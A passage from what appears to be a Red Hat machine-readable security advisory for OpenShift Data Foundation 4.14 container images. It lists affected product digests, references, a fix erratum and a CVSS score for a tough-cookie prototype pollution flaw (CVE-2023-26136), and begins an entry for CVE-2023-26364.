"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26136", }, { category: "external", summary: "RHBZ#2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26136", url: "https://www.cve.org/CVERecord?id=CVE-2023-26136", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", url: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/issues/282", url: "https://github.com/salesforce/tough-cookie/issues/282", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", url: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", }, { category: "external", summary: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", url: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", url: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", }, ], release_date: "2023-07-01T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-01-15T01:19:29+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:0323", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "tough-cookie: prototype pollution in cookie memstore", }, { cve: "CVE-2023-26364", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2023-11-17T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", 